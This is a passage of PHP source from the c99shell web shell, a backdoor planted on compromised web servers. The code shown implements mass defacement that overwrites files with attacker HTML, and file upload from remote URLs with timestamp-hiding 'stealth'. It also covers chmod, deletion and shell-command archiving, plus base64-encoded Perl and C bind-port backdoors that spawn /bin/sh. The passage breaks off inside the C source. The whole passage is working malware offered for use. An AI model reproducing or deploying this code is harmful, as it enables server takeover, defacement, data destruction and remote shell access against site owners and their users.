  1093.   if (empty($text)) {$text = " "; $text_regexp = 1;}
  1094.  
  1095.   $a = array
  1096.   (
  1097.    "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
  1098.    "text"=>$text, "text_regexp"=>$text_regxp,
  1099.    "text_wwo"=>$deface_text_wwo,
  1100.    "text_cs"=>$deface_text_cs,
  1101.    "text_not"=>$deface_text_not
  1102.   );
  1103.   $defacetime = getmicrotime();
  1104.   $in = array_unique(explode(";",$deface_in));
  1105.   foreach($in as $v) {c99fsearch($v);}
  1106.   $defacetime = round(getmicrotime()-$defacetime,4);
  1107.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1108.   else
  1109.   {
  1110.    $ls_arr = $found;
  1111.    $disp_fullpath = true;
  1112.    $act = $dspact = "ls";
  1113.   }
  1114.  }
  1115.  else
  1116.  {
  1117.   if (empty($deface_preview)) {$deface_preview = 1;}
  1118.   if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
  1119.  }
  1120.  echo "<form method=\"POST\">";
  1121.  if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
  1122.  echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1123. <b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
  1124. <br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
  1125. <br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
  1126. <br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
  1127. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
  1128. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1129. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1130. <br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
  1131. <br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
  1132. <br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
  1133.  if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
  1134. }
  1135. if ($act == "search")
  1136. {
  1137.  if (empty($search_in)) {$search_in = $d;}
  1138.  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1139.  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1140.  
  1141.  if (!empty($submit))
  1142.  {
  1143.   $found = array();
  1144.   $found_d = 0;
  1145.   $found_f = 0;
  1146.   $a = array
  1147.   (
  1148.    "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1149.    "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1150.    "text_wwo"=>$search_text_wwo,
  1151.    "text_cs"=>$search_text_cs,
  1152.    "text_not"=>$search_text_not
  1153.   );
  1154.   $searchtime = getmicrotime();
  1155.   $in = array_unique(explode(";",$search_in));
  1156.   foreach($in as $v)
  1157.   {
  1158.    c99fsearch($v);
  1159.   }
  1160.   $searchtime = round(getmicrotime()-$searchtime,4);
  1161.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1162.   else
  1163.   {
  1164.    $ls_arr = $found;
  1165.    $disp_fullpath = true;
  1166.    $act = $dspact = "ls";
  1167.   }
  1168.  }
  1169.  echo "<form method=\"POST\">
  1170. <input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1171. <b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
  1172. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1173. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1174. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
  1175. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
  1176. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1177. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1178. <br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
  1179.  if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
  1180. }
  1181. if ($act == "chmod")
  1182. {
  1183.  $perms = fileperms($d.$f);
  1184.  if (!$perms) {echo "Can't get current mode.";}
  1185.  elseif ($submit)
  1186.  {
  1187.   if (!isset($owner[0])) {$owner[0] = 0;}
  1188.   if (!isset($owner[1])) {$owner[1] = 0; }
  1189.   if (!isset($owner[2])) {$owner[2] = 0;}
  1190.   if (!isset($group[0])) {$group[0] = 0;}
  1191.   if (!isset($group[1])) {$group[1] = 0;}
  1192.   if (!isset($group[2])) {$group[2] = 0;}
  1193.   if (!isset($world[0])) {$world[0] = 0;}
  1194.   if (!isset($world[1])) {$world[1] = 0;}
  1195.   if (!isset($world[2])) {$world[2] = 0;}
  1196.   $sum_owner = $owner[0] + $owner[1] + $owner[2];
  1197.   $sum_group = $group[0] + $group[1] + $group[2];
  1198.   $sum_world = $world[0] + $world[1] + $world[2];
  1199.   $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
  1200.   $ret = @chmod($d.$f, $sum_chmod);
  1201.   if ($ret) {$act = "ls";}
  1202.   else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
  1203.  }
  1204.  else
  1205.  {
  1206.   echo "<b>Changing file-mode</b><br>";
  1207.   $perms = view_perms(fileperms($d.$f));
  1208.   $length = strlen($perms);
  1209.   $owner_r = $owner_w = $owner_x =
  1210.   $group_r = $group_w = $group_x =
  1211.   $world_r = $world_w = $group_x = "";
  1212.  
  1213.   if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
  1214.   if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
  1215.   if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
  1216.   if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
  1217.                                                  if ($perms[9] == "x") {$world_x = " checked";}
  1218.   echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
  1219. <input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
  1220. <input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
  1221. <table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
  1222. <input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
  1223. <input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
  1224. <input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
  1225. <input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
  1226. <input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
  1227. <td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
  1228. <input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
  1229. <input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
  1230. </tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
  1231.  }
  1232. }
  1233. if ($act == "upload")
  1234. {
  1235.  $uploadmess = "";
  1236.  $uploadpath = str_replace("\\","/",$uploadpath);
  1237.  if (empty($uploadpath)) {$uploadpath = $d;}
  1238.  elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
  1239.  if (!empty($submit))
  1240.  {
  1241.   global $HTTP_POST_FILES;
  1242.   $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1243.   if (!empty($uploadfile[tmp_name]))
  1244.   {
  1245.    if (empty($uploadfilename)) {$destin = $uploadfile[name];}
  1246.    else {$destin = $userfilename;}
  1247.    if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
  1248.   }
  1249.   elseif (!empty($uploadurl))
  1250.   {
  1251.    if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1252.    else
  1253.    {
  1254.     $destin = explode("/",$destin);
  1255.     $destin = $destin[count($destin)-1];
  1256.     if (empty($destin))
  1257.     {
  1258.      $i = 0;
  1259.      $b = "";
  1260.      while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1261.    }
  1262.    if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1263.    else
  1264.    {
  1265.     $st = getmicrotime();
  1266.     $content = @file_get_contents($uploadurl);
  1267.     $dt = round(getmicrotime()-$st,4);
  1268.     if (!$content) {$uploadmess .=  "Can't download file!<br>";}
  1269.     else
  1270.     {
  1271.      if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1272.      $fp = fopen($uploadpath.$destin,"w");
  1273.      if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  1274.      else
  1275.      {
  1276.       fwrite($fp,$content,strlen($content));
  1277.       fclose($fp);
  1278.       if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1279.      }
  1280.     }
  1281.    }
  1282.   }
  1283.  }
  1284.  if ($miniform)
  1285.  {
  1286.   echo "<b>".$uploadmess."</b>";
  1287.   $act = "ls";
  1288.  }
  1289.  else
  1290.  {
  1291.   echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
  1292. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  1293. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1294. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1295. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  1296. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
  1297. <input type=\"submit\" name=\"submit\" value=\"Upload\">
  1298. </form>";
  1299.  }
  1300. }
  1301. if ($act == "delete")
  1302. {
  1303.  $delerr = "";
  1304.  foreach ($actbox as $v)
  1305.  {
  1306.   $result = false;
  1307.   $result = fs_rmobj($v);
  1308.   if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  1309.   if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  1310.  }
  1311.  $act = "ls";
  1312. }
  1313. if ($act == "deface")
  1314. {
  1315.  $deferr = "";
  1316.  foreach ($actbox as $v)
  1317.  {
  1318.   $data = $deface_html;
  1319.   if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
  1320.   $data = str_replace("%%%filename%%%",basename($v),$data);
  1321.   $data = str_replace("%%%filepath%%%",$v,$data);
  1322.   $fp = @fopen($v,"w");
  1323.   fwrite($fp,$data);
  1324.   fclose($fp);
  1325.   if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
  1326.   if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
  1327.  }
  1328. }
  1329. if (!$usefsbuff)
  1330. {
  1331.  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
  1332. }
  1333. else
  1334. {
  1335.  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  1336.  if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  1337.  if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
  1338.  
  1339.  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  1340.  elseif ($actpastebuff)
  1341.  {
  1342.   $psterr = "";
  1343.   foreach($sess_data["copy"] as $k=>$v)
  1344.   {
  1345.    $to = $d.basename($v);
  1346.    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1347.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1348.   }
  1349.   foreach($sess_data["cut"] as $k=>$v)
  1350.   {
  1351.    $to = $d.basename($v);
  1352.    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1353.    unset($sess_data["cut"][$k]);
  1354.   }
  1355.   c99_sess_put($sess_data);
  1356.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1357.   $act = "ls";
  1358.  }
  1359.  elseif ($actarcbuff)
  1360.  {
  1361.   $arcerr = "";
  1362.   if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1363.   else {$ext = ".tar.gz";}
  1364.  
  1365.   if ($ext == ".tar.gz")
  1366.   {
  1367.    $cmdline = "tar cfzv";
  1368.   }
  1369.   $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1370.   foreach($objects as $v)
  1371.   {
  1372.    $v = str_replace("\\","/",$v);
  1373.    if (is_dir($v))
  1374.    {
  1375.     if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
  1376.     $v .= "*";
  1377.    }
  1378.    $cmdline .= " ".$v;
  1379.   }
  1380.   $ret = `$cmdline`;
  1381.   if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
  1382.   $ret = str_replace("\r\n","\n");
  1383.   $ret = explode("\n",$ret);
  1384.   if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1385.   foreach($sess_data["cut"] as $k=>$v)
  1386.   {
  1387.    if (in_array($v,$ret)) {fs_rmobj($v);}
  1388.    unset($sess_data["cut"][$k]);
  1389.   }
  1390.   c99_sess_put($sess_data);
  1391.   if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1392.   $act = "ls";
  1393.  }
  1394.  elseif ($actpastebuff)
  1395.  {
  1396.   $psterr = "";
  1397.   foreach($sess_data["copy"] as $k=>$v)
  1398.   {
  1399.    $to = $d.basename($v);
  1400.    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1401.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1402.   }
  1403.   foreach($sess_data["cut"] as $k=>$v)
  1404.   {
  1405.    $to = $d.basename($v);
  1406.    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1407.    unset($sess_data["cut"][$k]);
  1408.   }
  1409.   c99_sess_put($sess_data);
  1410.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1411.   $act = "ls";
  1412.  }
  1413. }
  1414. if ($act == "ls")
  1415. {
  1416.  if (count($ls_arr) > 0) {$list = $ls_arr;}
  1417.  else
  1418.  {
  1419.   $list = array();
  1420.   if ($h = @opendir($d))
  1421.   {
  1422.    while ($o = readdir($h)) {$list[] = $d.$o;}
  1423.    closedir($h);
  1424.   }
  1425.  }
  1426.  if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
  1427.  else
  1428.  {
  1429.   //Building array
  1430.   $tab = array();
  1431.   $amount = count($ld)+count($lf);
  1432.   $vd = "f"; //Viewing mode
  1433.   if ($vd == "f")
  1434.   {
  1435.    $row = array();
  1436.    $row[] = "<b>Name</b>";
  1437.    $row[] = "<b>Size</b>";
  1438.    $row[] = "<b>Modify</b>";
  1439.    if (!$win)
  1440.   {$row[] = "<b>Owner/Group</b>";}
  1441.    $row[] = "<b>Perms</b>";
  1442.    $row[] = "<b>Action</b>";
  1443.    
  1444.    $k = $sort[0];
  1445.    if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
  1446.    if (empty($sort[1])) {$sort[1] = "d";}
  1447.    if ($sort[1] != "a")
  1448.    {
  1449.     $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
  1450.    }
  1451.    else
  1452.    {
  1453.     $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
  1454.    }
  1455.    
  1456.    $row[$k] .= $y;
  1457.    for($i=0;$i<count($row)-1;$i++)
  1458.    {
  1459.     if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
  1460.    }
  1461.    
  1462.    $tab = array();
  1463.    $tab[cols] = array($row);
  1464.    $tab[head] = array();
  1465.    $tab[dirs] = array();
  1466.    $tab[links] = array();
  1467.    $tab[files] = array();
  1468.  
  1469.    foreach ($list as $v)
  1470.    {
  1471.     $o = basename($v);
  1472.     $dir = dirname($v);
  1473.      
  1474.     if ($disp_fullpath) {$disppath = $v;}
  1475.     else {$disppath = $o;}
  1476.     $disppath = str2mini($disppath,60);
  1477.  
  1478.     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1479.     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1480.  
  1481.     $uo = urlencode($o);
  1482.     $ud = urlencode($dir);
  1483.     $uv = urlencode($v);
  1484.  
  1485.     $row = array();
  1486.  
  1487.     if ($o == ".")
  1488.     {
  1489.      $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
  1490.      $row[] = "LINK";
  1491.     }
  1492.     elseif ($o == "..")
  1493.     {
  1494.      $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  1495.      $row[] = "LINK";
  1496.     }
  1497.     elseif (is_dir($v))
  1498.     {
  1499.      if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
  1500.      else {$type = "DIR";}
  1501.      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  1502.      $row[] = $type;
  1503.     }
  1504.     elseif(is_file($v))
  1505.     {
  1506.      $ext = explode(".",$o);
  1507.      $c = count($ext)-1;
  1508.      $ext = $ext[$c];
  1509.      $ext = strtolower($ext);
  1510.      $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  1511.      $row[] = view_size(filesize($v));
  1512.     }
  1513.     $row[] = date("d.m.Y H:i:s",filemtime($v));
  1514.      
  1515.     if (!$win)
  1516.     {
  1517.      $ow = @posix_getpwuid(fileowner($v));
  1518.      $gr = @posix_getgrgid(filegroup($v));
  1519.      $row[] = $ow["name"]."/".$gr["name"];
  1520.     }
  1521.          
  1522.     if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";}
  1523.     else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
  1524.  
  1525.     if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
  1526.     else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
  1527.  
  1528.     if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
  1529.     elseif (is_link($v)) {$tab[links][] = $row;}
  1530.     elseif (is_dir($v)) {$tab[dirs][] = $row;}
  1531.     elseif (is_file($v)) {$tab[files][] = $row;}
  1532.    }  
  1533.   }
  1534.   $v = $sort[0];
  1535.   function tabsort($a, $b)
  1536.   {
  1537.    global $v;
  1538.    return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
  1539.   }
  1540.   usort($tab[dirs], "tabsort");
  1541.   usort($tab[files], "tabsort");
  1542.   if ($sort[1] == "a")
  1543.   {
  1544.    $tab[dirs] = array_reverse($tab[dirs]);
  1545.    $tab[files] = array_reverse($tab[files]);
  1546.   }
  1547.   //Compiling table
  1548.   $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
  1549.   echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b></center><br>";
  1550.   echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
  1551.   foreach($table as $row)
  1552.   {
  1553.    echo "<tr>\r\n";
  1554.    foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  1555.    echo "</tr>\r\n";
  1556.   }
  1557.   echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  1558.   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  1559.   {
  1560.    echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1561.   }
  1562.   echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
  1563.   echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
  1564.   if ($usefsbuff)
  1565.   {
  1566.    echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
  1567.    echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
  1568.    echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
  1569.   }
  1570.   if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";}
  1571.   echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
  1572.   echo "</form>";
  1573.  }
  1574. }
  1575. if ($act == "bind")
  1576. {
  1577.  $bndsrcs = array(
  1578. "c99sh_bindport.pl"=>
  1579. "IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
  1580. "WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
  1581. "TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
  1582. "RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
  1583. "bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
  1584. "Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
  1585. "biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
  1586. "XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
  1587. "ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
  1588. "ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
  1589.  
  1590. "c99sh_bindport.c"=>
  1591. "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
  1592. "cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
  1593. "CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
  1594. "ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
  1595. "Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
  1596. "ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
  1597. "KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
  1598. "ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
  1599. "c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
  1600. "LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
  1601. "Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
  1602. "CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
  1603. "ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
